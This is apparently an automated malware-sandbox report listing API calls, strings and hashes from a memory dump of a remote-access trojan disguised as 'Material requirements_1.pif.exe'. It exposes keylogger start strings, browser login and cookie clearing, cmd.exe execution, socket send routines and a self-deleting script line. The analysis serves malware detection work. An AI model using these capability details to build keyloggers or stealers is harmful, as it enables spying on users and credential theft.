                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                        • String ID: KeepAlive | Disabled
                        • API String ID: 2993684571-305739064
                        • Opcode ID: 1c4db9832243d0eda189149083a568db31be4b3a7f45c94ba510965dd7bed6b7
                        • Instruction ID: 6d19fc1829a92c7d53a4a1495ceb054f41c43dbe57a1f104861afa743dff4d10
                        • Opcode Fuzzy Hash: 1c4db9832243d0eda189149083a568db31be4b3a7f45c94ba510965dd7bed6b7
                        • Instruction Fuzzy Hash: CDF0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890C75A
                        APIs
                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F74
                        • PlaySoundW.WINMM(00000000,00000000), ref: 00419F82
                        • Sleep.KERNEL32(00002710), ref: 00419F89
                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F92
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        • API ID: PlaySound$HandleLocalModuleSleepTime
                        • String ID: Alarm triggered
                        • API String ID: 614609389-2816303416
                        • Opcode ID: ec93029a8d426c1f2d9bf456f9acac57abdb377192e8fa82d20351f1c069c2bf
                        • Instruction ID: 9f384250976fc0018356f16acd63f039c2840ecbd7916ddbe948a6dbceb933d3
                        • Opcode Fuzzy Hash: ec93029a8d426c1f2d9bf456f9acac57abdb377192e8fa82d20351f1c069c2bf
                        • Instruction Fuzzy Hash: 0AE09A22A0422037862033BA7C0FC2F3E28DAC6B71B4000BFF905A61A2AE540810C6FB
                        APIs
                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
                        • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
                        • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6
                        Strings
                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                        • API String ID: 3024135584-2418719853
                        • Opcode ID: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                        • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                        • Opcode Fuzzy Hash: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                        • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        • Opcode ID: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                        • Instruction ID: 7508e0c950cfb5c07cf094bbf9e96825b82cecf32722f8b1b9d99ff1c2b3a0ae
                        • Opcode Fuzzy Hash: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                        • Instruction Fuzzy Hash: 0171C5319043169BEB21CF55C884ABFBB75FF51360F14426BEE50A7281C7B89C61CBA9
                        APIs
                          • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                        • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                        • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                        • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                        • String ID:
                        • API String ID: 3525466593-0
                        • Opcode ID: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                        • Instruction ID: 8d6069787765cd8089b920b9a1774e70d04059e2b0db351aafb66b48fc3d0dee
                        • Opcode Fuzzy Hash: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                        • Instruction Fuzzy Hash: 3161C370200301ABD720DF66C981BA77BA6BF44744F04411AF9058B786EBF8E8C5CB99
                        APIs
                          • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                        • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                          • Part of subcall function 0041B197: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B1AC
                          • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                          • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                        • String ID:
                        • API String ID: 4269425633-0
                        • Opcode ID: 9969269c57af8964515969a0aa7c84db142fe4f72ac327e049761c9b5f0d9465
                        • Instruction ID: d2ffcfca6af8ede7debefd7e7f3e1a30d02436113b149e9281f59cd47d6ae75e
                        • Opcode Fuzzy Hash: 9969269c57af8964515969a0aa7c84db142fe4f72ac327e049761c9b5f0d9465
                        • Instruction Fuzzy Hash: FE41E0311083415BC325F761D8A1AEFB7E9AFA4305F50453EF449931E1EF389949C65A
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                        • Instruction ID: 83c4e6e90d702b2f07d890eb74d666dbf881ebcc09a41958ef300e35f10bd01d
                        • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                        • Instruction Fuzzy Hash: 6041F732A002049FEB24DF79C881A5EB7B5EF89718F1585AEE515EB341DB35EE01CB84
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3FD,?,00000000,?,00000001,?,?,00000001,0043E3FD,?), ref: 0044FF30
                        • __alloca_probe_16.LIBCMT ref: 0044FF68
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFB9
                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399CF,?), ref: 0044FFCB
                        • __freea.LIBCMT ref: 0044FFD4
                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                        • String ID:
                        • API String ID: 313313983-0
                        • Opcode ID: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                        • Instruction ID: e1bca46ef404bc628c8ce9314a93e43560c5f9fd50e6ec62d56fad3e85d1de09
                        • Opcode Fuzzy Hash: 32ac3bd373e466217b4644ebee2ff76607fe703c26dcd28c1e1d2c5ecdebf3ce
                        • Instruction Fuzzy Hash: B731DC32A0020AABEB248F65DC81EAF7BA5EB01314F04417AFC05D7251E739DD59CBA8
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 0044E154
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177
                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
                        • _free.LIBCMT ref: 0044E1B0
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                        • String ID:
                        • API String ID: 336800556-0
                        • Opcode ID: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                        • Instruction ID: 6461b62384d036c2086eeacc55d57ac9fa1e09cc40192d7ba399f745acfb761f
                        • Opcode Fuzzy Hash: 4bdc18aade4f5afa9f676aa8b8aa9a2318643a84ce2148a0478020116eae0cde
                        • Instruction Fuzzy Hash: 7301D4726417117F33215AB76C8CC7B7A6DEAC6FA5319013AFC04D2241DA788C0291B9
                        APIs
                        • GetLastError.KERNEL32(00434413,00434413,?,00445369,00446B52,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?), ref: 00446F58
                        • _free.LIBCMT ref: 00446F8D
                        • _free.LIBCMT ref: 00446FB4
                        • SetLastError.KERNEL32(00000000,?,00434413), ref: 00446FC1
                        • SetLastError.KERNEL32(00000000,?,00434413), ref: 00446FCA
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        • API ID: ErrorLast$_free
                        • String ID:
                        • API String ID: 3170660625-0
                        • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                        • Instruction ID: 63179894ab579f9662c65df04eda1c4e2cfad31ee62bae45dd706db9c2735e37
                        • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                        • Instruction Fuzzy Hash: 4F01D67620C7006BF61227757C85D2B1669EBC3776727013FF859A2292EE6CCC0A415F
                        APIs
                        • _free.LIBCMT ref: 0044F7C5
                          • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                        • _free.LIBCMT ref: 0044F7D7
                        • _free.LIBCMT ref: 0044F7E9
                        • _free.LIBCMT ref: 0044F7FB
                        • _free.LIBCMT ref: 0044F80D
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                        • Instruction ID: 070623068f58a673a03bb4c9f7ddd8597c716d05cca38f31fa25b5a97b2bc473
                        • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                        • Instruction Fuzzy Hash: CBF01232505610ABA620EB59F9C1C1773EAEA427247A5882BF048F7A41C77DFCC0866C
                        APIs
                        • _free.LIBCMT ref: 00443315
                          • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                        • _free.LIBCMT ref: 00443327
                        • _free.LIBCMT ref: 0044333A
                        • _free.LIBCMT ref: 0044334B
                        • _free.LIBCMT ref: 0044335C
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                        • Instruction ID: ba617ab3bec5ed021708e8d9793ec2f19a393bb4d037fa002b455214101d6763
                        • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                        • Instruction Fuzzy Hash: E1F03AB08075208FA712AF6DBD014493BA1F706764342513BF41AB2A71EB780D81DA8E
                        APIs
                        • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                        • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                        • IsWindowVisible.USER32(?), ref: 004167A1
                          • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                          • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        • API ID: ProcessWindow$Open$TextThreadVisible
                        • String ID: (FG
                        • API String ID: 3142014140-2273637114
                        • Opcode ID: c7f659c7f8dd07594aa0d58b43293f081d02aa6a155b2a5aace8fb7cb86be1bb
                        • Instruction ID: 0f4eca603db080fccf2d1fd4ef2663101a063c6717372172f7cb8e83fece0a9a
                        • Opcode Fuzzy Hash: c7f659c7f8dd07594aa0d58b43293f081d02aa6a155b2a5aace8fb7cb86be1bb
                        • Instruction Fuzzy Hash: 4871E5321082454AC325FB61D8A5ADFB3E4AFE4308F50453EF58A530E1EF746A49CB9A
                        APIs
                        • _strpbrk.LIBCMT ref: 0044D4B8
                        • _free.LIBCMT ref: 0044D5D5
                          • Part of subcall function 0043A864: IsProcessorFeaturePresent.KERNEL32(00000017,0043A836,00434413,?,?,?,00434413,00000016,?,?,0043A843,00000000,00000000,00000000,00000000,00000000), ref: 0043A866
                          • Part of subcall function 0043A864: GetCurrentProcess.KERNEL32(C0000417,?,00434413), ref: 0043A888
                          • Part of subcall function 0043A864: TerminateProcess.KERNEL32(00000000,?,00434413), ref: 0043A88F
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                        • String ID: *?$.
                        • API String ID: 2812119850-3972193922
                        • Opcode ID: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                        • Instruction ID: 5f997c8b803d418df4da1c9987192ed3b052b04d21a58de33721a68e59565ce0
                        • Opcode Fuzzy Hash: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
                        • Instruction Fuzzy Hash: AC519571D00209AFEF14DFA9C841AAEB7B5EF58318F24816FE454E7341DA799E01CB54
                        APIs
                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                          • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                          • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                          • Part of subcall function 0041B6BA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6CF
                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                        • String ID: XCG$`AG$>G
                        • API String ID: 2334542088-2372832151
                        • Opcode ID: f37316863ccad659ca2bf97aa1cfe92418112d60c8e754e1c486478c198cb9ff
                        • Instruction ID: 51992e77998e29381c1adf086b38d2340c1e01042c89ae8fe5bc0f900910b53e
                        • Opcode Fuzzy Hash: f37316863ccad659ca2bf97aa1cfe92418112d60c8e754e1c486478c198cb9ff
                        • Instruction Fuzzy Hash: 5E5132321042405AC325F775D8A2AEF73E5ABE4308F50493FF94A631E2EE785949C69E
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Material requirements_1.pif.exe,00000104), ref: 00442724
                        • _free.LIBCMT ref: 004427EF
                        • _free.LIBCMT ref: 004427F9
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        • API ID: _free$FileModuleName
                        • String ID: C:\Users\user\Desktop\Material requirements_1.pif.exe
                        • API String ID: 2506810119-52253571
                        • Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                        • Instruction ID: a09326ba0634f9fc59332e3a0850bb80beab61cea56b0999b5ec2e0ea5ed553b
                        • Opcode Fuzzy Hash: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                        • Instruction Fuzzy Hash: 04318075A00218AFEB21DF999D8199EBBFCEB85354B50406BF80497311D6B88E81CB59
                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                          • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                          • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                          • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                          • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                        • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                        • String ID: /sort "Visit Time" /stext "$8>G
                        • API String ID: 368326130-2663660666
                        • Opcode ID: 0c297dda1a405b052cf5921024dcdcc024882d594569d29d210d62c2d05d7870
                        • Instruction ID: 14a2de6876ab63adfaf4c6869ac5cc0218acab93288f76d9a5f97452818968e4
                        • Opcode Fuzzy Hash: 0c297dda1a405b052cf5921024dcdcc024882d594569d29d210d62c2d05d7870
                        • Instruction Fuzzy Hash: 36317331A0021556CB14FBB6DC969EE7775AF90318F40007FF906B71D2EF385A8ACA99
                        APIs
                        • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                        • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                        • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                        Memory Dump Source
                        • Source File: 00000007.00000002.4528733935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_400000_Material requirements_1.jbxd
                        • API ID: CreateThread$LocalTimewsprintf
                        • String ID: Offline Keylogger Started
                        • API String ID: 465354869-4114347211
                        APIs
                          • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                          • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                        • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                        • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                        • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                        Strings
                        Similarity
                        • API ID: CreateThread$LocalTime$wsprintf
                        • String ID: Online Keylogger Started
                        • API String ID: 112202259-1258561607
                        APIs
                        • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAD9
                        • GetLastError.KERNEL32(?,0044A9A1,`@,0046DD28,0000000C), ref: 0044AAE3
                        • __dosmaperr.LIBCMT ref: 0044AB0E
                        Strings
                        Similarity
                        • API ID: CloseErrorHandleLast__dosmaperr
                        • String ID: `@
                        • API String ID: 2583163307-951712118
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                        • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                        • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                        Strings
                        Similarity
                        • API ID: CloseEventHandleObjectSingleWait
                        • String ID: Connection Timeout
                        • API String ID: 2055531096-499159329
                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                          • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 004347EC
                          • Part of subcall function 004347CD: _Yarn.LIBCPMT ref: 00434810
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                        Strings
                        Similarity
                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                        • String ID: bad locale name
                        • API String ID: 3628047217-1405518554
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                        Strings
                        Similarity
                        • API ID: ExecuteShell
                        • String ID: /C $cmd.exe$open
                        • API String ID: 587946157-3896048727
                        APIs
                        • TerminateThread.KERNEL32(004099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                        • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                        • TerminateThread.KERNEL32(00409993,00000000,?,pth_unenc), ref: 0040AFE3
                        Strings
                        Similarity
                        • API ID: TerminateThread$HookUnhookWindows
                        • String ID: pth_unenc
                        • API String ID: 3123878439-4028850238
                        APIs
                        • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                        • GetProcAddress.KERNEL32(00000000), ref: 00401441
                        Strings
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: GetCursorInfo$User32.dll
                        • API String ID: 1646373207-2714051624
                        APIs
                        • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                        • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                        Strings
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetLastInputInfo$User32.dll
                        • API String ID: 2574300362-1519888992
                        APIs
                        Similarity
                        • API ID: __alldvrm$_strrchr
                        • String ID:
                        • API String ID: 1036877536-0
                        APIs
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        APIs
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                        • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                        • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                        Similarity
                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                        • String ID:
                        • API String ID: 3360349984-0
                        APIs
                        Strings
                        • Cleared browsers logins and cookies., xrefs: 0040B8EF
                        • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                        Similarity
                        • API ID: Sleep
                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                        • API String ID: 3472027048-1236744412
                        APIs
                          • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                          • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                          • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                        • Sleep.KERNEL32(00000BB8), ref: 004115C3
                        Strings
                        Similarity
                        • API ID: CloseOpenQuerySleepValue
                        • String ID: @CG$exepath$BG
                        • API String ID: 4119054056-3221201242
                        APIs
                          • Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
                          • Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
                          • Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739
                        • Sleep.KERNEL32(000001F4), ref: 00409C95
                        • Sleep.KERNEL32(00000064), ref: 00409D1F
                        Strings
                        Similarity
                        • API ID: Window$SleepText$ForegroundLength
                        • String ID: [ $ ]
                        • API String ID: 3309952895-93608704
                        APIs
                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5DE
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041B5FB
                        • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041B60F
                        • CloseHandle.KERNEL32(00000000), ref: 0041B61C
                        Similarity
                        • API ID: File$CloseCreateHandlePointerWrite
                        • String ID:
                        • API String ID: 3604237281-0
                        APIs
                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0043811F
                          • Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
                          • Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6
